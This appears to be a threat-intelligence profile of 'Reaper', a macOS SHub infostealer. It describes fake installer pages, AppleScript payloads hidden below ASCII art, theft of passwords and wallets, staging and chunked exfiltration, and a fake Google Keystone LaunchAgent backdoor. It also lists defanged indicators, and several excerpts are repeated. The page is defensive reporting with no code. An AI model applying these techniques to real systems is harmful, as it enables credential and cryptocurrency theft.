Reaper is a name used in multiple distinct malware contexts in the provided content, but the strongest current usage refers to a macOS infostealer variant in the SHub family. SentinelOne describes Reaper as a fresh SHub variant targeting macOS users through fake WeChat and Miro installer pages hosted on typo-squatted infrastructure including mlcrosoft[.]co[.]com. The malware impersonates Apple, Microsoft, and Google during the infection chain, uses the applescript:// URL scheme to open Script Editor with a pre-populated malicious AppleScript, and hides the real command below visible content with padding and ASCII art. This execution flow is described as bypassing Apple Tahoe 26.4 protections aimed at earlier Terminal-based SHub delivery techniques.
Once executed, Reaper prompts for the user’s macOS login password, steals browser data, password manager contents, macOS Keychain and iCloud-related data, Telegram session data, developer-related files, and cryptocurrency wallet information. It also includes a FileGrabber module that searches Desktop and Documents for business- or finance-relevant files such as .docx, .wallet, .key, .json, and .rdp, stages data under /tmp/shub_<random>/, and uploads stolen content in chunks. Reported exfiltration infrastructure includes hebsbsbzjsjshduxbs[.]xyz via /gate/chunk. Reaper targets browser extensions and desktop wallet applications including MetaMask, Phantom, Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite; in some cases it can replace wallet application files such as app.asar to enable continued theft.
For persistence, Reaper creates a fake Google Software Update path at ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate and registers a malicious LaunchAgent at ~/Library/LaunchAgents/com.google.keystone.agent.plist. The LaunchAgent runs every 60 seconds, sending system details to a command-and-control /api/bot/heartbeat endpoint. If code is returned, Reaper decodes it, writes it to a temporary hidden script such as /tmp/.c.sh, executes it with the current user’s privileges, and deletes it, effectively providing a persistent remote execution backdoor. Anti-analysis behavior includes debugger loops, console tampering, and replacing page content with a Russian-language access denied message if DevTools are opened. The malware also checks for Russian-language input settings and exits on likely CIS-region systems.
The content also mentions "Reaper" in two other contexts: as a historical antivirus program created by Ray Tomlinson to remove Creeper, and as a separate IoT botnet/thingbot referenced in relation to Netgear router exploitation. However, the detailed malware reporting in the provided material most clearly identifies Reaper as the SHub macOS infostealer variant.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
28 distinct techniques documented for this family, organized by ATT&CK tactic.
The updated build, now called Reaper, spreads through fake websites that impersonate popular software... It uses a fake webpage to silently open your Mac’s Script Editor, pre-loaded with malicious code, and all a user has to do is click one button to unknowingly launch the infection.
Before finishing its initial run, Reaper establishes persistence using a directory structure built to mimic Google’s legitimate Keystone update service. It places a base64-decoded bash script named GoogleUpdate... then registers a LaunchAgent using a property list named com.google.keystone.agent.plist . This causes the script to execute silently every 60 seconds in the background.
Reaper drops a highly persistent User LaunchAgent script onto the host... The native LaunchAgent configuration is designed to trigger this GoogleUpdate beacon script automatically every 60 seconds, logging system details and checking in with the C2 server’s /api/bot/heartbeat endpoint.
the fake websites use a specific internet link format ( applescript:// ) to automatically open the built-in macOS Script Editor app. The hackers hide the malicious code inside the app by using extensive ASCII art and arbitrary whitespace injection to obfuscate the functional script sequences below the visible scroll boundary
Before finishing its initial run, Reaper establishes persistence using a directory structure built to mimic Google’s legitimate Keystone update service. It places a base64-decoded bash script named GoogleUpdate... then registers a LaunchAgent using a property list named com.google.keystone.agent.plist . This causes the script to execute silently every 60 seconds in the background.
Before finishing its initial run, Reaper establishes persistence using a directory structure built to mimic Google’s legitimate Keystone update service. It places a base64-decoded bash script named GoogleUpdate... then registers a LaunchAgent using a property list named com.google.keystone.agent.plist . This causes the script to execute silently every 60 seconds in the background.
The hackers hide the malicious code inside the app by using extensive ASCII art and arbitrary whitespace injection to obfuscate the functional script sequences below the visible scroll boundary of the graphical user interface.
the campaign distributing an updated version of SHub Stealer under the build tag Reaper... attackers used fake download pages for popular apps such as WeChat and Miro to target victims.
If the server returns a “code” payload, the script decodes it, writes it to /tmp/.c.sh , runs it with the current user’s privileges, and then deletes it.
Once the script runs, it displays a fake Apple security update message to trick the user into typing in their system password.
Earlier builds could already steal browser data, macOS Keychains, iCloud account data, and Telegram session information. The new version goes much further, now targeting Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion browsers, along with their extensions.
The malware also carries an AMOS-style Filegrabber that hunts through Desktop and Documents folders for valuable files, including .docx, .wallet, .key, .csv, .xls, and .json formats.
Once the script runs, it displays a fake Apple security update message to trick the user into typing in their system password.
Files are staged in /tmp/shub_random/ before being split into 10MB chunks and uploaded to the attacker’s server via curl.
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS SHub variant that uses fake WeChat and Miro installers delivered via a typo-squatted Microsoft-themed domain, executes via AppleScript/Script Editor, establishes persistence through a fake Google Keystone LaunchAgent, steals files, browser credentials, developer keystrokes, and cryptocurrency wallet data, and maintains a persistent remote execution channel through heartbeat-delivered shell scripts.
A macOS infostealer variant that spoofs trusted brands, steals credentials, password manager data, browser data, crypto wallet data, developer files, Keychain/iCloud and Telegram data, grabs business/financial documents, injects cryptocurrency wallet applications for continued theft, and establishes persistence via a GoogleUpdate-themed LaunchAgent backdoor that can beacon to C2 and execute remote code.
macOS infostealer variant that uses fake installers and AppleScript-based social engineering to steal browser data, password manager data, cryptocurrency wallet data, Keychain and iCloud information, Telegram session data, and selected files, while also establishing LaunchAgent-based persistence and a remote code execution backdoor.
A macOS infostealer variant that masquerades as a critical system update or workplace software, steals browser data, password manager contents, cryptocurrency wallet data, and selected documents, replaces wallet apps with trojanized versions, and establishes persistence via a hidden backdoor that polls a C2 server for further commands.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.